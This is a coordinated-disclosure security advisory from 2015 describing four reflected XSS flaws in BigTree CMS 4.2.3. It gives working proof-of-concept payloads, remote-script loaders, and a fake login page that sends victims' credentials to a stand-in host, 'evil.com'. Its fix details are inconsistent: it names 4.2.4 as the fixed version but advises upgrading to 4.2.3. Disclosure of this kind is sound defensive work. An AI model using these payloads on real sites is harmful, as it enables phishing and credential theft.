BigTree CMS 4.2.3 Cross Site Scripting
Posted on 13 August 2015
BigTree CMS 4.2.3: Multiple Cross Site Scripting Vulnerabilities Security Advisory – Curesec Research Team Online Reference: http://blog.curesec.com/article/blog/BigTree-CMS-423-Multiple-Cross-Site-Scripting-Vulnerabilities-38.html 1. Introduction Affected Product: BigTree CMS 4.2.3 Fixed in: 4.2.4 Fixed Version Link: https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip Vendor Contact: contribute@bigtreecms.org Vulnerability Type: Multiple Reflected XSS Remote Exploitable: Yes Reported to vendor: 07/07/2015 Disclosed to public: 08/07/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description Various components of the BigTree CMS are vulnerable to cross site scripting. With this, it is possible to inject and execute arbitrary JavaScript code. This can for example be used by an attacker to inject a JavaScript keylogger or perform phishing attacks. Please find attached three XSS attacks exploitable via GET, and one exploitable via POST requests. The attacks using GET requests can be exploited by getting the victim to click a link or visit an attacker controlled website. The attack using a POST request requires the victim to visit an attacker controlled website. XSS 1 (via POST) The script that processes Ajax requests for the file browser does not properly sanitize the "file" parameter, opening it up to reflected XSS. Sample POC: <form action="http://localhost/BigTree-CMS/core/admin/ajax/developer/extensions/file-browser.php" method="post" name="myform"> <input type="hidden" name="cloud_disabled" value="true" /> <input type="hidden" name="file" value=""><script>alert(1)</script>" /> <input type="submit" value="Create" /> </form> <script>document.myform.submit();</script> Payload to load a remote script: "><script src='http://localhost/s.js'></script> Code: core/admin/ajax/developer/extensions/file-browser.php:127: <input type="hidden" name="file" id="bigtree_foundry_file" value="<?=$_POST["file"]?>" /> XSS 2 (via GET) The script that processes Ajax requests for the integrity check does not properly sanitize the "id" parameter, opening it up to reflected XSS. Limitations: Single and double quotes are escaped. Sample POC: http://localhost/BigTree-CMS/site/index.php/admin/ajax/dashboard/integrity-check/module?table=1&id=<script>alert(1)</script> Loading a remote script: http://localhost/BigTree-CMS/site/index.php/admin/ajax/dashboard/integrity-check/module?table=1&id=<script src=http://localhost/s.js></script> Code: core/admin/ajax/dashboard/integrity-check/module.php:31: <a href="<?=ADMIN_ROOT.$module["route"]."/".$action["route"]."/".$_GET["id"]?>/" XSS 3 (via GET) The script that processes page view requests does not properly sanitize the "id" value that is given in the URL, thus opening it up to reflected XSS. Limitations: forward slash cannot be used Sample POC: http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/'"><img src="%23" onerror="alert('xsstest')"> Loading a remote script: http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/'"><img src="%23" onerror="s=document.createElement('script');s.src='x2Fx2Flocalhostx2Fs.js';document.body.appendChild(s);"> Code: The input is echoed in multiple places: core/admin/modules/pages/_properties.php:54 <p><?=$page["id"]?></p> core/admin/modules/pages/_properties.php:70 <p><a href="<?=$preview_url?>" target="_blank"><?=$preview_url?></a></p> core/admin/layouts/default.php:153 <a href="<?=ADMIN_ROOT.$item["link"]?>/<?=htmlspecialchars(rtrim($get_string,"&"))?>"<? if ($active_item == $item) { ?> XSS 4 (via GET) The "id" value described in the previous section is additionally echoed inside script tags, opening it up to a further XSS injection. Limitations: forward slash cannot be used and single and double quotes are escaped. Simple POC: http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/xsstest", }});}});alert(1);$("%23pages_pages").sortable({ axis: "y", containment: "parent", handle: ".icon_sort", items: "li", placeholder: "ui-sortable-placeholder", tolerance: "pointer", update: function() {$.ajax("", { type: "POST", data: { id: " Code: core/admin/modules/pages/_nav-tree.php:138 <script> $("#pages_<?=$class?>").sortable({ axis: "y", containment: "parent", handle: ".icon_sort", items: "li", placeholder: "ui-sortable-placeholder", tolerance: "pointer", update: function() { $.ajax("<?=ADMIN_ROOT?>ajax/pages/order/", { type: "POST", data: { id: "<?=$page["id"]?>", sort: $("#pages_<?=$class?>").sortable("serialize") } }); }}); </script> 3. Proof of Concept Codes: 3.1 Example Phishing Site: The attack can for example be used for phishing, by displaying the login page and sending the data submitted by the victim to an attacker controlled server. var payload = document.createElement('div'); payload.innerHTML = " <!doctype html> <head> <meta charset="utf-8"> <meta name="robots" content="noindex,nofollow" /> <title>Trees of All Sizes Login</title> <link rel="stylesheet" href="//localhost/BigTree-CMS-master/site/index.php/admin/css/main.css" type="text/css" media="screen" charset="utf-8" /> <script src="//localhost/BigTree-CMS-master/site/index.php/admin/js/lib.js"></script> <script src="//localhost/BigTree-CMS-master/site/index.php/admin/js/main.js"></script> </head> <body class="login"> <div class="login_wrapper"> <h1>Trees of All Sizes</h1> <form method="post" action="http:/evil.com/log.php" class="module"> <fieldset> <label>Email</label> <input type="email" id="user" name="user" class="text" value="" /> </fieldset> <fieldset> <label>Password</label> <input type="password" id="password" name="password" class="text" /> <p><input type="checkbox" name="stay_logged_in" checked="checked" /> Remember Me</p> </fieldset> <fieldset class="lower"> <a href="http://localhost/BigTree-CMS-master/site/index.php/admin/login/forgot-password/" class="forgot_password">Forgot Password?</a> <input type="submit" class="button blue" value="Login" /> </fieldset> </form> <a href="http://www.bigtreecms.com" class="login_logo" target="_blank"></a> <span class="login_copyright"> Version 4.2.3 · © 2015 <a href="http://www.fastspot.com" target="_blank"> Fastspot</a> </span> </div> </body> </html> "; document.replaceChild(payload, document.documentElement); 4. Solution To mitigate this issue please upgrade at least to version 4.2.3: https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip Please note that a newer version might already be available. 5. Report Timeline 07/07/2015 Informed Vendor about Issue 07/08/2015 Vendor send Fixes for confirmation 07/10/2015 Fixes Confirmed 07/26/2015 Vendor releases Version 4.2.3 08/07/2015 Disclosed to public
